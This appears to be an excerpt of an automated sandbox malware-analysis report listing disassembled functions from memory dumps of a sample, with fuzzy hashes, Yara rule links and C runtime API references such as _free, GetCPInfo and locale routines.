Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656f4a777774534caa05a715824ad20497830ec17b4398a361ec3e82dfec4615
Instruction ID: 100b8cee90d65afa7019534a137431bf7960b49b70b1c6d8b2881b9d11ce4f10
Opcode Fuzzy Hash: 656f4a777774534caa05a715824ad20497830ec17b4398a361ec3e82dfec4615
Instruction Fuzzy Hash: 35322431E29F414DD7239634C822336A688AFB73D9F55D737F819B5AA6EB28D4C34104

Function 00422900 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df8f44aef9fe5a1f5d8b14a9bf8e1b23ac779909c2b745feba246b19b04330a
Instruction ID: e6144c86a6494996e490532ea08d506f5abc2083ddeb76534139d5e984126229
Opcode Fuzzy Hash: 3df8f44aef9fe5a1f5d8b14a9bf8e1b23ac779909c2b745feba246b19b04330a
Instruction Fuzzy Hash: F6719A6188E3C24FC7578B344865685BF70AF63154B5E87DFC0C6CE8A3E64C994AC762

Function 004096D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d740161b33631ab170f4d256c2da6652de78e4f5c1c52d961da4adf10c2e6c39
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 65112B7B220042C3D6188E3DD9F49B7E395EBC6320B2D437BD1426B7DAD13AED459A08

Function 005F9937 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b11b7db64b3ea3e50447d60ae1350e98c7718f397be922fc2aaf869c9b427234
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6011387720084B439705866ECAB43BBEF86FBC5320B2F467EC3818B358D1AA9944D600

Function 007C4A8B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007C4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c4000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 27277084b7399b081e25d67508f906e92903cad4405590f8e94c8b7995e1730f
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: EF115EB2380100AFDB54DF95DC95FA673EAEB89360B29806DED04CB356D679EC41C760

Function 005F0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 863051e66c8a79b30188aad475c6f9cf6a4493174bac05a33afdcecc6e0a7bcc
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C801F7726016088FDF21DF60C804BBB37E9FB85306F0944A4DB06D72C3E378A8418B80

Function 00411002 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92976e27265fe885d89e0f6fad5462a5c08e5a4a2b5dbc5281e8658eadfb1027
Instruction ID: 9d4d74434834254528024ee84e91f10d0bd617a4a60769b67240e580e2896ceb
Opcode Fuzzy Hash: 92976e27265fe885d89e0f6fad5462a5c08e5a4a2b5dbc5281e8658eadfb1027
Instruction Fuzzy Hash: C8E04632A21268EBCB14DB89990498AB7FCEB48B04B11009AB601D3220C274DE80C7D4

Function 00601269 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92976e27265fe885d89e0f6fad5462a5c08e5a4a2b5dbc5281e8658eadfb1027
Instruction ID: 57bca1953df3782944d5716f835a040a4765081175f4e6533a344dff888c3013
Opcode Fuzzy Hash: 92976e27265fe885d89e0f6fad5462a5c08e5a4a2b5dbc5281e8658eadfb1027
Instruction Fuzzy Hash: 05E08C72A61228EBCB19DBCCC90499BF3EDEB46B10B1544AAB501D7241C270DF40CBD4

Function 0040CEE0 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0040CF4F
_free.LIBCMT ref: 0040CF65
_free.LIBCMT ref: 0040CF78
_free.LIBCMT ref: 0040CF8D
_free.LIBCMT ref: 0040CFA2
GetCPInfo.KERNEL32(?,?), ref: 0040CFEC

Part of subcall function 00412D11: _free.LIBCMT ref: 00412D7C

_free.LIBCMT ref: 0040D257
_free.LIBCMT ref: 0040D26A
_free.LIBCMT ref: 0040D278
_free.LIBCMT ref: 0040D283
_free.LIBCMT ref: 0040D2C5
_free.LIBCMT ref: 0040D2CD
_free.LIBCMT ref: 0040D2D3
_free.LIBCMT ref: 0040D2DB
_free.LIBCMT ref: 0040D2E9

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 956bed5e3b4879471945d27332185ddaf8c6038110f2f5277a528b3dd1ad7f05
Instruction ID: 1cb612411c139886d40124ed31f4442011cfda19fd69fa24199e0fc8e559cd63
Opcode Fuzzy Hash: 956bed5e3b4879471945d27332185ddaf8c6038110f2f5277a528b3dd1ad7f05
Instruction Fuzzy Hash: D2D1BF71E002459FDB20CFA5C881BEEBBF5BF08304F14446EE995B7392D778A8858B14

Function 005FD147 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005FD1B6
_free.LIBCMT ref: 005FD1CC
_free.LIBCMT ref: 005FD1DF
_free.LIBCMT ref: 005FD1F4
_free.LIBCMT ref: 005FD209
GetCPInfo.KERNEL32(?,?), ref: 005FD253

Part of subcall function 00602F78: _free.LIBCMT ref: 00602FE3

_free.LIBCMT ref: 005FD4BE
_free.LIBCMT ref: 005FD4D1
_free.LIBCMT ref: 005FD4DF
_free.LIBCMT ref: 005FD4EA
_free.LIBCMT ref: 005FD52C
_free.LIBCMT ref: 005FD534
_free.LIBCMT ref: 005FD53A
_free.LIBCMT ref: 005FD542
_free.LIBCMT ref: 005FD550

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 850d41b9ea7620a9bbc0545b0f443e09ea2c189d2119f7f654799f89de4b0c77
Instruction ID: d2cca6ea29a6c5aebc5b2cc80c9abce813c802eda90c3584c2cb00493a91264e
Opcode Fuzzy Hash: 850d41b9ea7620a9bbc0545b0f443e09ea2c189d2119f7f654799f89de4b0c77
Instruction Fuzzy Hash: 30D1BC71D402099FDB15DFA8C881BFEBBF6BF09300F14402DE995AB282D779A845CB64

Function 00407D94 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042B3A4,00000FA0,?,?,00407D72), ref: 00407DA0
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00407D72), ref: 00407DAB
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00407D72), ref: 00407DBC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00407DCE
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00407DDC
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00407D72), ref: 00407DFF
DeleteCriticalSection.KERNEL32(0042B3A4,00000007,?,?,00407D72), ref: 00407E1B
CloseHandle.KERNEL32(00000000,?,?,00407D72), ref: 00407E2B

Strings

SleepConditionVariableCS, xrefs: 00407DC8
kernel32.dll, xrefs: 00407DB7
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00407DA6
WakeAllConditionVariable, xrefs: 00407DD4

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 3afd87156110544aab6276892685be635895f3eea0f680a35fae2ea3849afc99
Instruction ID: f51652bd0824f6c3b56ec331e706575a6c2393657ae3b3ff8739b7016bdcb41a
Opcode Fuzzy Hash: 3afd87156110544aab6276892685be635895f3eea0f680a35fae2ea3849afc99
Instruction Fuzzy Hash: 570192B0F44622AFD7205B61AC0CBA72F98EF08745B554037FD05E2294DB78D80287AE

Function 00417AE4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00417B28

Part of subcall function 00416D90: _free.LIBCMT ref: 00416DAD
Part of subcall function 00416D90: _free.LIBCMT ref: 00416DBF
Part of subcall function 00416D90: _free.LIBCMT ref: 00416DD1
Part of subcall function 00416D90: _free.LIBCMT ref: 00416DE3
Part of subcall function 00416D90: _free.LIBCMT ref: 00416DF5
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E07
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E19
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E2B
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E3D
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E4F
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E61
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E73
Part of subcall function 00416D90: _free.LIBCMT ref: 00416E85

_free.LIBCMT ref: 00417B1D

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

_free.LIBCMT ref: 00417B3F
_free.LIBCMT ref: 00417B54
_free.LIBCMT ref: 00417B5F
_free.LIBCMT ref: 00417B81
_free.LIBCMT ref: 00417B94
_free.LIBCMT ref: 00417BA2
_free.LIBCMT ref: 00417BAD
_free.LIBCMT ref: 00417BE5
_free.LIBCMT ref: 00417BEC
_free.LIBCMT ref: 00417C09
_free.LIBCMT ref: 00417C21

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e7be0badeeee65b7607a85a425d296751cfa89815e67eb585a08e475a6316948
Instruction ID: 8ef81dd196716b2b915fd2155742e49367034b374876661dc2addb1b3a6ed9f2
Opcode Fuzzy Hash: e7be0badeeee65b7607a85a425d296751cfa89815e67eb585a08e475a6316948
Instruction Fuzzy Hash: 8A316B31A086409FEB20AB39D841BD777F8AF04358F10485BE545D7261DF38FDC09A28

Function 00607D4B Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00607D8F

Part of subcall function 00606FF7: _free.LIBCMT ref: 00607014
Part of subcall function 00606FF7: _free.LIBCMT ref: 00607026
Part of subcall function 00606FF7: _free.LIBCMT ref: 00607038
Part of subcall function 00606FF7: _free.LIBCMT ref: 0060704A
Part of subcall function 00606FF7: _free.LIBCMT ref: 0060705C
Part of subcall function 00606FF7: _free.LIBCMT ref: 0060706E
Part of subcall function 00606FF7: _free.LIBCMT ref: 00607080
Part of subcall function 00606FF7: _free.LIBCMT ref: 00607092
Part of subcall function 00606FF7: _free.LIBCMT ref: 006070A4
Part of subcall function 00606FF7: _free.LIBCMT ref: 006070B6
Part of subcall function 00606FF7: _free.LIBCMT ref: 006070C8
Part of subcall function 00606FF7: _free.LIBCMT ref: 006070DA
Part of subcall function 00606FF7: _free.LIBCMT ref: 006070EC

_free.LIBCMT ref: 00607D84

Part of subcall function 00601332: HeapFree.KERNEL32(00000000,00000000,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?), ref: 00601348
Part of subcall function 00601332: GetLastError.KERNEL32(?,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?,?), ref: 0060135A

_free.LIBCMT ref: 00607DA6
_free.LIBCMT ref: 00607DBB
_free.LIBCMT ref: 00607DC6
_free.LIBCMT ref: 00607DE8
_free.LIBCMT ref: 00607DFB
_free.LIBCMT ref: 00607E09
_free.LIBCMT ref: 00607E14
_free.LIBCMT ref: 00607E4C
_free.LIBCMT ref: 00607E53
_free.LIBCMT ref: 00607E70
_free.LIBCMT ref: 00607E88

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: af609678471b8ab540c2b8950501b42a478479f5e86e843434d43beba63a830c
Instruction ID: eb891fe721f4efbb3dcfe5b703dd6615265229ad55a975c7d158e0ba927916ad
Opcode Fuzzy Hash: af609678471b8ab540c2b8950501b42a478479f5e86e843434d43beba63a830c
Instruction Fuzzy Hash: 4F313D31A886019FEB6CAA38D845B9777EAAF11350F108869E455DA6D1DB30FC41CB28

Function 00416E8E Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416ED6
_free.LIBCMT ref: 00416EFA
_free.LIBCMT ref: 00416F07
_free.LIBCMT ref: 00416F2C
_free.LIBCMT ref: 00416F39
_free.LIBCMT ref: 00416F42
_free.LIBCMT ref: 0041721C
_free.LIBCMT ref: 00417224

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e41503d28dd11bd7fe0718666aa7379fed2ee30793eb722c50613972bb756957
Instruction ID: 289456a794c91143f6907cdb1787af5c8beb0e5eb35f7ab2867d5c7da80143eb
Opcode Fuzzy Hash: e41503d28dd11bd7fe0718666aa7379fed2ee30793eb722c50613972bb756957
Instruction Fuzzy Hash: B4C13572E40204ABEB20DBA9DD82FDF77F8AB08704F14415AFA05FB282D674D9919B54

Function 0040AD92 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0040AE8F
type_info::operator==.LIBVCRUNTIME ref: 0040AEB1
___TypeMatch.LIBVCRUNTIME ref: 0040AFC0
IsInExceptionSpec.LIBVCRUNTIME ref: 0040B092
_UnwindNestedFrames.LIBCMT ref: 0040B116
CallUnexpected.LIBVCRUNTIME ref: 0040B131

Strings

csm, xrefs: 0040ADCF
csm, xrefs: 0040AEE8
csm, xrefs: 0040AE3C

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f3429ef2961120a81704dcf61d6a393a75a4e9ca0d1cd37ae8c040499ab8c3c9
Instruction ID: cc8f2867485ecc917d8df80ada476cf44b09731445d5f8dbc605b04ea880c073
Opcode Fuzzy Hash: f3429ef2961120a81704dcf61d6a393a75a4e9ca0d1cd37ae8c040499ab8c3c9
Instruction Fuzzy Hash: 06B17971900209AFCF29DFA5C9819AFB7B5EF54314F14406AE8107B282D339DA61CF9A

Function 005FAFF9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 005FB0F6
type_info::operator==.LIBVCRUNTIME ref: 005FB118
___TypeMatch.LIBVCRUNTIME ref: 005FB227
IsInExceptionSpec.LIBVCRUNTIME ref: 005FB2F9
_UnwindNestedFrames.LIBCMT ref: 005FB37D
CallUnexpected.LIBVCRUNTIME ref: 005FB398

Strings

csm, xrefs: 005FB14F
csm, xrefs: 005FB036
csm, xrefs: 005FB0A3

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f3429ef2961120a81704dcf61d6a393a75a4e9ca0d1cd37ae8c040499ab8c3c9
Instruction ID: 3bbc77d98f4bf4a7dc2eb2357bcfa99589ff9406335e8951db667bce90139195
Opcode Fuzzy Hash: f3429ef2961120a81704dcf61d6a393a75a4e9ca0d1cd37ae8c040499ab8c3c9
Instruction Fuzzy Hash: 45B1857580020EEFEF15DFA4C8859BEBFB5BF44310F14495AEA156B252D738DA10CB92

Function 00416517 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00416541
_free.LIBCMT ref: 0041661A
_free.LIBCMT ref: 00416647

Strings

h0~, xrefs: 00416568, 004165A7, 004165B4, 004165EB, 004166B3

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: h0~
API String ID: 3409252457-3514706242
Opcode ID: abfb8984c9808d6e54cda3c8091c513ac817ca6de7efe6184c1b92d18b48b0b7
Instruction ID: 6bb97234e57ebdd3b5bfa0acdb9cd461aedb8e1cf6a6eb7d905a473a4542deb0
Opcode Fuzzy Hash: abfb8984c9808d6e54cda3c8091c513ac817ca6de7efe6184c1b92d18b48b0b7
Instruction Fuzzy Hash: 0F51F771E04341AFDB20AF7A9881AEE7BA4DF05318F12417FE51097292EB39D9C18B5D

Function 0060677E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 006067A8
_free.LIBCMT ref: 00606881
_free.LIBCMT ref: 006068AE

Strings

h0~, xrefs: 006067CF, 0060680E, 0060681B, 00606852, 0060691A

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: h0~
API String ID: 3409252457-3514706242
Opcode ID: f92bb1e09f75f24be055b281814dd1d40c8c11941d02d87547bbde2c6be35149
Instruction ID: 58db8cbdd95609e953c8c2d68ddf98143982bdbefe155936b3ac85fe34561837
Opcode Fuzzy Hash: f92bb1e09f75f24be055b281814dd1d40c8c11941d02d87547bbde2c6be35149
Instruction Fuzzy Hash: 5A51F871D84306AFDF28AF78C881AAF7BE6EF41314B10817DF5109B2C1DB3195518BA5

Function 00410A98 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00410AAE

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

_free.LIBCMT ref: 00410ABA
_free.LIBCMT ref: 00410AC5
_free.LIBCMT ref: 00410AD0
_free.LIBCMT ref: 00410ADB
_free.LIBCMT ref: 00410AE6
_free.LIBCMT ref: 00410AF1
_free.LIBCMT ref: 00410AFC
_free.LIBCMT ref: 00410B07
_free.LIBCMT ref: 00410B15

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fb8572b17f5b698edbda33c4bdbf26437e4859f76a16e6b61c908198aad836f0
Instruction ID: 532114661d7cc21c1ccb803f4a505aca41ca0d619d73e92d427d9cd810ad73ac
Opcode Fuzzy Hash: fb8572b17f5b698edbda33c4bdbf26437e4859f76a16e6b61c908198aad836f0
Instruction Fuzzy Hash: 4321A676900548AFCB01EF95C881DDE7FB9EF08344B0045AAF6159B521EB35DAC59F84

Function 00600CFF Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00600D15

Part of subcall function 00601332: HeapFree.KERNEL32(00000000,00000000,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?), ref: 00601348
Part of subcall function 00601332: GetLastError.KERNEL32(?,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?,?), ref: 0060135A

_free.LIBCMT ref: 00600D21
_free.LIBCMT ref: 00600D2C
_free.LIBCMT ref: 00600D37
_free.LIBCMT ref: 00600D42
_free.LIBCMT ref: 00600D4D
_free.LIBCMT ref: 00600D58
_free.LIBCMT ref: 00600D63
_free.LIBCMT ref: 00600D6E
_free.LIBCMT ref: 00600D7C

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6169125313e151299e838c55eab60358d29eaae796496bf1b255aadfab8948fd
Instruction ID: 357ad6e8d02930f730b56ab8ab53c39e4a6a40224cb8379228b1346357971d55
Opcode Fuzzy Hash: 6169125313e151299e838c55eab60358d29eaae796496bf1b255aadfab8948fd
Instruction Fuzzy Hash: E4219876940108AFCB49EF94C881DDF7BBABF08340F4141AAB5159F561DB31EA46CF84

Function 0041AB01 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004142B6), ref: 0041AB1A

Strings

asin, xrefs: 0041AC47
acos, xrefs: 0041AC50
log10, xrefs: 0041AB5C, 0041AB6B
exp, xrefs: 0041AB99, 0041ABFE
sqrt, xrefs: 0041AC59
pow, xrefs: 0041ABB8, 0041AC62, 0041ACAF
log, xrefs: 0041AB77, 0041AB86

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: b315de14e886d419a131e10cfd9e655e4d89157cdfad871d30ec4b611574c16f
Instruction ID: 9d40425260f2b60ae0798ad46d5f9e2e57650a40aa438aff3d747c49d58a7b2f
Opcode Fuzzy Hash: b315de14e886d419a131e10cfd9e655e4d89157cdfad871d30ec4b611574c16f
Instruction Fuzzy Hash: 23517B70A0561ACBCB008FA9E84C1EEBBB5FB45314F548047D980A6364DB7999B5CB8F

Function 004172AD Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041731B
_free.LIBCMT ref: 00417327
_free.LIBCMT ref: 00417450
_free.LIBCMT ref: 0041745B

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6d948e056769666ad3bf101041396a65d2b0df6821bb06a60e705c9276d1582d
Instruction ID: 5c62111fa73eb636dbddea1450409250f5324d7862e1634d6ee9b88866a95af7
Opcode Fuzzy Hash: 6d948e056769666ad3bf101041396a65d2b0df6821bb06a60e705c9276d1582d
Instruction Fuzzy Hash: 326112719046049FDB20DF74C841BEBBBF9AF08350F20446FE945EB281EB78AC818B59

Function 00607514 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00607582
_free.LIBCMT ref: 0060758E
_free.LIBCMT ref: 006076B7
_free.LIBCMT ref: 006076C2

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ebcd49dd6a13ac54e4da0b58e67ef295cf3b1b7f9df17644648b00cb4ddb4a3d
Instruction ID: 5b296b5828a780216ace5d8e53bc18064ba5e81ac54ba0a911f4f0a958680ce0
Opcode Fuzzy Hash: ebcd49dd6a13ac54e4da0b58e67ef295cf3b1b7f9df17644648b00cb4ddb4a3d
Instruction Fuzzy Hash: 6361E071D94705AFDB28DF68C841BABB7EAAF44350F20442DE846EB2C1EB71AD018B54

Function 00402D60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00402DE3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00402E2F
__Getctype.LIBCPMT ref: 00402E48
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00402E64
std::_Lockit::~_Lockit.LIBCPMT ref: 00402EF9

Strings

bad locale name, xrefs: 00402F17
P0@, xrefs: 00402E42

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: P0@$bad locale name
API String ID: 1840309910-3992594774
Opcode ID: 340212e5769ce11c4ca132c247af826724228569a08e38620ff75d7b1cbfd6ac
Instruction ID: b5d85c29f90632508f9dee1397b19755b7d1ea8349819f3356bb76636665464b
